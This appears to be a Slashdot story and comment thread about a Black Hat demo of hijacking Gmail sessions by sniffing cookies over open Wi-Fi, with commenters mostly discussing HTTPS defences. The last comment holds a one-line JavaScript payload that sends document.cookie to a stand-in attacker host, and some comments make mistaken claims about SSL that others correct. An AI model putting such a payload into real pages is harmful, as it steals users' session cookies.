Point-and-Click Gmail Hacking Shown at Black Hat

not5150 writes "Using Gmail or most other webmail programs over an unsecured access point just got a bit more dangerous. At Black Hat Robert Graham, CEO of errata security, showed how to capture and clone session cookies very quickly over connections without encryption. He even hijacked a shocked attendee's Gmail account in the middle of his presentation. 'While Ou was typing, Graham was running Ferret and sniffing all the cookies that were being sent from Ou's laptop and Google. Graham then clicked on Ou's IP address and Gmail page, complete with Ou's recently sent message on the screen. We photographed both Graham's and Ou's laptop at that time and posted it to the picture gallery. You'll see that the contents are exactly the same.'"

Good reason to install Better GMail!

[Mr.+X]

The Firefox extension forces GMail to always run over SSL. It's great!

Re:Good reason to install Better GMail!

[afidel]

I think you should have linked to the Mozilla addons page. I know I wouldn't install a firefox addon from a random site with the name hacker in the URL.

Correct me if I'm wrong but

[trifish]

Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a differnt IP address so the cookie is rejected as invalid. The only situation where this solution may get a bit annoying is if you're behind a load-balancing proxy, which changes your IP address on every request (fortunately, this is somewhat rare.) It's better than allow easy hijacks...

Re:Correct me if I'm wrong but

[vidarlo]

Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a differnt IP address so the cookie is rejected as invalid.

More often than not, all users of a wireless net is behind a NAT device, which makes all the devices have the same official IP. The same applies to most domestic, workplace and school wlans, so really, that would make little or no difference. Now, in a IPv6 world, it would make a difference, since everyone has a unique IP there...

Re:Slow News day?

[andrewd18]

This is the first time it's been compiled into an automated tool. Note that this tool doesn't apply to just GMail, but any web service that uses a cookie, when the user is on an unencrypted wireless network.

Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.

Re:Could be fixed easily by Google. Shame.

Gmail already supports ssl. Just use https instead of http in the url.

Re:Could be fixed easily by Google. Shame.

[ohearn]

Gmail will use SSL over any browser, it just doesn't by default (which is a shame, but easily fixed for those of us that care)

Re:Could be fixed easily by Google. Shame.

[SatanicPuppy]

They offer it. All you have to do is go to https://mail.google.com/ rather than http://mail.google.com./

I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.

Bottom line

[Kadin2048]

I think the upshot of this isn't really "look at us, we can sniff plaintext Wifi connections," but "look at one of the biggest players in web mail use plaintext connections even though they ought to know it's a hideously bad idea."

It's more of an indictment of Google than anything, because they default to unencrypted HTTP rather than HTTPS, and most users won't know that they can go to https://mail.google.com/mail/ to force smarter behavior.

Re:Bottom line

[It'sYerMam]

And furthermore, if you use google via a customised google page (http://www.google.com/ig) then even if you redirect that to https://.../ then the link to GMail is still regular http.

Re:Slow News day?

if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.

You have no idea how SSL works.

Re:Could be fixed easily by Google. Shame.

[Bob+535604]

I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.

A lot of people wouldn't know about this or even look for it and you know it. Google could make https the default or even mandatory, and it would completely kill this entire issue.

Re:Slow News day?

[The+Velour+Fog]

Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in. SSL uses Diffie-Hellman key exchange so no unencrypted key is ever sent

Always use https://gmail.google.com

[StandardCell]

Although they don't have a public key scheme strong enough for the AES-256 (requires 15360-bit RSA or 256-bit ECC for public key), you should always be logging in using https://gmail.google.com/ from all locations (even home) to ensure the entire session is encrypted.

Re:Slow News day?

[Kartoffel]

That's easy enough to fix with a Firefox plugin: http://www.customizegoogle.com/

Re:Could be fixed easily by Google. Shame.

[teknopurge]

We have redirects setup on all plain-text channels that have a login to SSL, and have for the past 6 years; this is beyond common-sense.

Re:Could be fixed easily by Google. Shame.

[huge]

Shame on them also?

Yes.

Even if there are others with the same problem doesn't give you excuse to ignore the problem.

Easy fix

[teslatug]

Bookmark the secure address and use that (who wouldn't over open wireless??). You could also use http://www.customizegoogle.com/ with Firefox if you're using Gmail to force it to go to the secure URL.

use gmail over https

[buddyglass]

Accessing http://gmail.google.com/ will redirect you to a secure page for login, but after that you're back in plain text. If you start at https://gmail.google.com/ then afaik the rest of your gmail session runs over SSL.

Re:psh

Go home, Dad, you're pissed.

Re:Slow News day?

[Aeiri]

This is the first time it's been compiled into an automated tool. No it's not, there's another that's better and it's been around for a long while. It was once Ethereal, and now called Wireshark.

Make it default to https

[ajs318]

#  This is how I did it:
#
#  Actual snippet from my Apache configuration .....  mostly.
#  Some details have been changed to protect the innocent
#  And some details have been changed to protect the guilty
#
#  The virtual host "secure.mydomain.co.uk" cannot be accessed
#  by http; only by https.
#
#  The insecure port
<VirtualHost 10.11.12.13:80>
    ServerName secure.mydomain.co.uk
    DocumentRoot /var/www/
    <Directory /var/www/>
        RedirectMatch ^/[^iI] /insecure/
        # In this directory is a page with a dire warning
        # that https is required to access this server.
        # NB.  To avoid creating an infinite loop, we never
        # redirect if request begins with I or i.
    </Directory>
</VirtualHost>
#  The secure port
<VirtualHost 10.11.12.13:443>
    SSLEngine on
    .....
</VirtualHost>

Re:Slow News day?

[gpuk]

That is the correct behaviour.

Essentially, if you enter via http://mail.google.com/ Google remembers this and encrypts only the login process and then reverts back to plain text. If you enter via https://mail.google.com/ your session remains encrypted throughout.

Another Extension

[lupine]

I use the Gmail Notifier firefox extension which checks for messages and forces gmail to use secure connections.

re: Yes it is

1- Robert did not release this tool to the public.
2- Automatic HTTP session hijacking tools have existed for 7+ years.

(new Image()).src= "http://evil.com/?"+document.cookie